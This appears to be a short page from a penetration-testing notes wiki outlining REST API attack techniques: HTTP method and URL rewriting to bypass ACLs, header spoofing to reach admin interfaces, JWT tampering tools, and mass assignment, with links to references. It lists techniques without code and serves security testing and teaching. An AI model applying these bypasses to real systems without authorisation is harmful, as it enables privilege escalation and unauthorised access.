REST API - Bypasses and Privilege Escalations
REST API security testing
Methodology
https://portswigger.net/web-security/api-testing
Bypassing API filter and ACL by rewriting HTTP methods an URLs
Access Admin Interface
using HTTP headers rewriting trusted client's IP address or Hosts.
JWT Access Token Tampering
JWT Editor : Burp plugin
Available in BApp store, explore also advanced JWT header attacks https://portswigger.net/web-security/jwt#jwt-header-parameter-injections
JWT Tool
https://github.com/ticarpi/jwt_tool/wiki/Attack-Methodology
Mass Assignment
Observer object properties and try to set them (search for hidden parameters PARAMMINER)
Vulnerable API Project to practice with
Last updated
Was this helpful?